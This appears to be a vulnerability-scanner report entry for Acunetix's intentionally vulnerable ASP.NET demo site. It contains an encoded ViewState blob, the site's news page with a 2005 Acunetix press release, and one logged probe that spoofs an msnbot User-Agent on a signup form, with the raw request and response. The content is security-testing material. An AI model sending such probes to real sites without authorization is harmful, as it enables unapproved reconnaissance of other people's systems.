AgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X/qqjYsEEZ5ETd0S8=" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 545 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1062 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Signup.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,062 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=qDfEfqbw&tbPassword=&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:14 GMT Content-Length: 13354
Response Body - size: 13,354 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BSxZb3UgbmVlZCB0byBlbnRlciBhIHVzZXJuYW1lIGFuZCBhIHBhc3N3b3JkIR8CZ2RkZLCqa4FNGDvFa7Lbgd5xkWxCmNtO" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" 